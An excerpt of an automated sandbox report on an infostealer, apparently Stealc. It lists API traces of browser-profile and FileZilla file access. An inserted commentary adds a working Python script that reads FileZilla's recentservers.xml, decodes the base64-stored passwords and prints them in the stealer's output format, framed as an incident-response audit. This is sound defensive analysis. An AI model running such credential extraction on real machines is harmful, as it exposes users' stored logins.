                            • Instruction Fuzzy Hash: 1992AE71E1521BAFCB61AF65DD98AEE77BAAF11300F04412AF805AB351DB74DD01CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDBEF
                            • lstrlen.KERNEL32(00704CA8), ref: 006DDBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDC17
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006DDC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDC4C
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDC8F
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006DDCD0
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006DDCF0
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006DDD0A
                            • lstrlen.KERNEL32(006FCFEC), ref: 006DDD1D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDD7B
                            • lstrlen.KERNEL32(00701794), ref: 006DDD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDDA3
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDDAF
                            • lstrlen.KERNEL32(?), ref: 006DDDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 006DDDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDE19
                            • lstrlen.KERNEL32(00701794), ref: 006DDE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DDE6F
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDE7B
                            • lstrlen.KERNEL32(01018B48), ref: 006DDE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDEBB
                            • lstrlen.KERNEL32(00701794), ref: 006DDEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DDEE6
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDEF2
                            • lstrlen.KERNEL32(01018928), ref: 006DDF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDFA5
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DDFB1
                            • lstrlen.KERNEL32(01018B48), ref: 006DDFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DDFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DDFF4
                            • lstrlen.KERNEL32(00701794), ref: 006DDFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE022
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006DE02E
                            • lstrlen.KERNEL32(01018928), ref: 006DE03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DE06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 006DE0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 006DE0E7
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE11F
                            • lstrlen.KERNEL32(0101DE28), ref: 006DE12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE155
                            • lstrcat.KERNEL32(00000000,?), ref: 006DE15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE19F
                            • lstrcat.KERNEL32(00000000), ref: 006DE1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006DE1F9
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE22F
                            • lstrlen.KERNEL32(010188F8), ref: 006DE23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE261
                            • lstrcat.KERNEL32(00000000,010188F8), ref: 006DE269
                            • lstrlen.KERNEL32(\Brave\Preferences), ref: 006DE274
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE29B
                            • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 006DE2A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE2CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE30F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE349
                            • DeleteFileA.KERNEL32(?), ref: 006DE381
                            • StrCmpCA.SHLWAPI(?,0101DD80), ref: 006DE3AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE3F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE41C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE445
                            • StrCmpCA.SHLWAPI(?,01018928), ref: 006DE468
                            • StrCmpCA.SHLWAPI(?,01018B48), ref: 006DE47D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE4D9
                            • GetFileAttributesA.KERNEL32(00000000), ref: 006DE4E0
                            • StrCmpCA.SHLWAPI(?,0101DE40), ref: 006DE58E
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DE5C4
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006DE639
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE678
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE6A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE6C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE70E
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE737
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE75C
                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 006DE776
                            • DeleteFileA.KERNEL32(?), ref: 006DE7D2
                            • StrCmpCA.SHLWAPI(?,010189D8), ref: 006DE7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE88C
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE8B5
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE8EE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DE916
                            • lstrcpy.KERNEL32(00000000,?), ref: 006DE952
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 2635522530-726946144
                            • Opcode ID: e507b39d5e07eb7f04c7944263b4ed6c674104cdbcc807efe15a04ea0237ea95
                            • Instruction ID: be3e25d03cd073c80c0412d38852deb16acbad08e681df037878e72d3c9ed25e
                            • Opcode Fuzzy Hash: e507b39d5e07eb7f04c7944263b4ed6c674104cdbcc807efe15a04ea0237ea95
                            • Instruction Fuzzy Hash: 7B927CB1E1021A9FCB60AFB5DC99AAE77BAAF54300F04452AF845AB351DB34DC458B90
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E18D2
                            • lstrlen.KERNEL32(\*.*), ref: 006E18DD
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E18FF
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 006E190B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1932
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E1947
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006E1967
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006E1981
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E19BF
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E19F2
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E1A1A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1A25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A4C
                            • lstrlen.KERNEL32(00701794), ref: 006E1A5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1A80
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1AB4
                            • lstrlen.KERNEL32(?), ref: 006E1AC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1AE5
                            • lstrcat.KERNEL32(00000000,?), ref: 006E1AF3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1B19
                            • lstrlen.KERNEL32(010189E8), ref: 006E1B2F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1B59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1B64
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1B8F
                            • lstrlen.KERNEL32(00701794), ref: 006E1BA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1BC3
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1BCF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1BF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1C25
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1C30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1C57
                            • lstrlen.KERNEL32(00701794), ref: 006E1C69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1C8B
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1C97
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1CC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1CEF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1CFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D21
                            • lstrlen.KERNEL32(00701794), ref: 006E1D33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D55
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1D61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1D8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1DB9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E1DC4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1DED
                            • lstrlen.KERNEL32(00701794), ref: 006E1E19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1E36
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1E42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1E68
                            • lstrlen.KERNEL32(0101DE58), ref: 006E1E7E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1EB2
                            • lstrlen.KERNEL32(00701794), ref: 006E1EC6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1EE3
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1EEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1F15
                            • lstrlen.KERNEL32(0101E518), ref: 006E1F2B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1F5F
                            • lstrlen.KERNEL32(00701794), ref: 006E1F73
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1F90
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E1F9C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E1FC2
                            • lstrlen.KERNEL32(0100A770), ref: 006E1FD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2000
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E200B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2036
                            • lstrlen.KERNEL32(00701794), ref: 006E2048
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2067
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E2073
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2098
                            • lstrlen.KERNEL32(?), ref: 006E20AC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E20D0
                            • lstrcat.KERNEL32(00000000,?), ref: 006E20DE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2103
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E213F
                            • lstrlen.KERNEL32(0101DE28), ref: 006E214E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E2176
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E2181
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: f4e4936a37799711f2fe448ad58be2df0df61984c7a922c6d49894672ee2e7b6
                            • Instruction ID: 3b8f97065025d01c32939d99a00a8ca209951ebc4b535664c416aee1410ac152
                            • Opcode Fuzzy Hash: f4e4936a37799711f2fe448ad58be2df0df61984c7a922c6d49894672ee2e7b6
                            • Instruction Fuzzy Hash: E562AE70A263179FCB21AB66CC58AEFB7BBAF51700F084129B8059B351DB34DD01DBA0
                            APIs
                            • wsprintfA.USER32 ref: 006E392C
                            • FindFirstFileA.KERNEL32(?,?), ref: 006E3943
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006E396C
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006E3986
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E39BF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E39E7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E39F2
                            • lstrlen.KERNEL32(00701794), ref: 006E39FD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3A1A
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3A26
                            • lstrlen.KERNEL32(?), ref: 006E3A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3A53
                            • lstrcat.KERNEL32(00000000,?), ref: 006E3A61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3A8A
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E3ACE
                            • lstrlen.KERNEL32(?), ref: 006E3AD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3B05
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3B10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3B36
                            • lstrlen.KERNEL32(00701794), ref: 006E3B48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3B6A
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3B76
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3B9E
                            • lstrlen.KERNEL32(?), ref: 006E3BB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3BD2
                            • lstrcat.KERNEL32(00000000,?), ref: 006E3BE0
                            • lstrlen.KERNEL32(010188F8), ref: 006E3C0B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3C31
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3C3C
                            • lstrlen.KERNEL32(010189E8), ref: 006E3C5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3C84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3C8F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3CB7
                            • lstrlen.KERNEL32(00701794), ref: 006E3CC9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3CE8
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3CF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3D1A
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E3D47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3D52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3D79
                            • lstrlen.KERNEL32(00701794), ref: 006E3D8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3DAD
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3DE2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3E11
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3E1C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3E43
                            • lstrlen.KERNEL32(00701794), ref: 006E3E55
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3E77
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3EAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3EDB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E3EE6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3F0D
                            • lstrlen.KERNEL32(00701794), ref: 006E3F1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3F41
                            • lstrcat.KERNEL32(00000000,00701794), ref: 006E3F4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3F75
                            • lstrlen.KERNEL32(?), ref: 006E3F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3FA9
                            • lstrcat.KERNEL32(00000000,?), ref: 006E3FB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E3FE0
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E401F
                            • lstrlen.KERNEL32(0101DE28), ref: 006E402E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4056
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4061
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E408A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E40CE
                            • lstrcat.KERNEL32(00000000), ref: 006E40DB
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006E42D9
                            • FindClose.KERNEL32(00000000), ref: 006E42E8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: 5bbc43b952ff532e2dc84d14e986158186b249af3ec34ab2eb23714436bd15e4
                            • Instruction ID: cd84bc360484539ede4e4f4daac59e5a1f5b170844e909b00aeb4bd9387375ba
                            • Opcode Fuzzy Hash: 5bbc43b952ff532e2dc84d14e986158186b249af3ec34ab2eb23714436bd15e4
                            • Instruction Fuzzy Hash: 50627D71A26767AFCB61AF76CC58AEE77BAAF50300F044129B805A7351DB34DE01CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6995
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006E69C8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6A29
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E6A34
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6A5D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 006E6A77
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6A99
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 006E6AA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6AD0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E6B00
                            • LocalAlloc.KERNEL32(00000040,?), ref: 006E6B35
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6B9D
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E6BCD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: 720e5130f3145dbee3c345ff17aa33aba689578211559ab557df6ee01cb7cacc
                            • Instruction ID: 6643fb9987833ecd77577515445dbbc95ee51cf0e567d8d514d191208927921e
                            • Opcode Fuzzy Hash: 720e5130f3145dbee3c345ff17aa33aba689578211559ab557df6ee01cb7cacc
                            • Instruction Fuzzy Hash: 9642E270E16356AFCB21ABB6CC59BAEB7BBAF24740F044419F905E7352DB34D9018B90
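The record above resolves CSIDL_PROFILE (0x28, the SHGetFolderPathA argument) and appends \AppData\Roaming\FileZilla\recentservers.xml, then reads the file into a buffer and, in the later record whose StrStrA calls look for <Host> and <Port>, pulls the <Host>/<Port>/<User>/<Pass encoding="base64"> fields into a 'browser: FileZilla' / 'login:' / 'password:' / 'profile: null' / 'url:' block. The script below is an added example (not Stealc's code and not FileZilla's) for the responder who has to decide what to rotate: it parses a recentservers.xml the same way, shows that the base64 "encoding" is recoverable by any process running as the user, and renders the result in the layout those strings suggest. SAMPLE_XML is constructed; the encoding="crypt" form for entries protected by a FileZilla master password is my understanding of FileZilla's format and is not something this report shows.

```python
"""Inventory what an infostealer can lift from FileZilla's recentservers.xml.
Saved passwords are stored as <Pass encoding="base64">: encoding, not
encryption, so any process running as the user reads them back.
Added example for this page, not Stealc's or FileZilla's code. SAMPLE_XML is
constructed; the encoding="crypt" entry models the master-password form as I
understand it (assumption, not shown in the report)."""
import base64
import os
import xml.etree.ElementTree as ET


def default_path() -> str:
    # CSIDL_PROFILE (the 0x28 passed to SHGetFolderPathA in the record) plus
    # the suffix string the record appends.
    return os.path.join(os.path.expanduser("~"),
                        "AppData", "Roaming", "FileZilla", "recentservers.xml")


def extract_servers(xml_text: str) -> list:
    """One dict per <Server>; 'password' is the recovered plaintext or None."""
    out = []
    for srv in ET.fromstring(xml_text).iter("Server"):
        pw = srv.find("Pass")
        password, storage = None, "none"
        if pw is not None and pw.text:
            # no encoding attribute is treated as legacy plain text (assumption)
            storage = pw.get("encoding", "plain")
            if storage == "base64":
                password = base64.b64decode(pw.text).decode("utf-8", "replace")
            elif storage == "plain":
                password = pw.text
        out.append({"host": srv.findtext("Host", ""), "port": srv.findtext("Port", ""),
                    "user": srv.findtext("User", ""), "password": password,
                    "storage": storage})
    return out


def exposed(entries: list) -> list:
    """Entries whose password is recoverable without a master password."""
    return [e for e in entries if e["password"] is not None]


def render(entries: list) -> str:
    """Same field names the stealer's output strings use, one block per server."""
    blocks = []
    for e in entries:
        blocks.append("\n".join([
            "browser: FileZilla", "profile: null",
            f"url: {e['host']}:{e['port']}", f"login: {e['user']}",
            f"password: {e['password'] if e['password'] is not None else ''}"]))
    return "\n\n".join(blocks)


def audit(path: str = None) -> list:
    """Read the real file when present (what to rotate after infection), else []."""
    path = path or default_path()
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8") as fh:
        return exposed(extract_servers(fh.read()))


SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.1" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host><Port>21</Port><Protocol>0</Protocol>
      <User>deploy</User><Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host><Port>22</Port><Protocol>1</Protocol>
      <User>ops</User>
    </Server>
    <Server>
      <Host>ftp.internal.test</Host><Port>21</Port><Protocol>0</Protocol>
      <User>backup</User><Pass encoding="crypt">ZmFrZQ==</Pass>
    </Server>
  </RecentServers>
</FileZilla3>
"""

if __name__ == "__main__":
    print(render(exposed(extract_servers(SAMPLE_XML))))
```

Run it against the real path on a host confirmed to have executed this sample and treat every entry it prints as compromised: the stealer copied the whole file, so a credential is exposed whether or not the operator ever used that bookmark. Enabling FileZilla's master password, or using SFTP with key authentication and no stored password, removes the entries from the recoverable set.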
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DDBC1
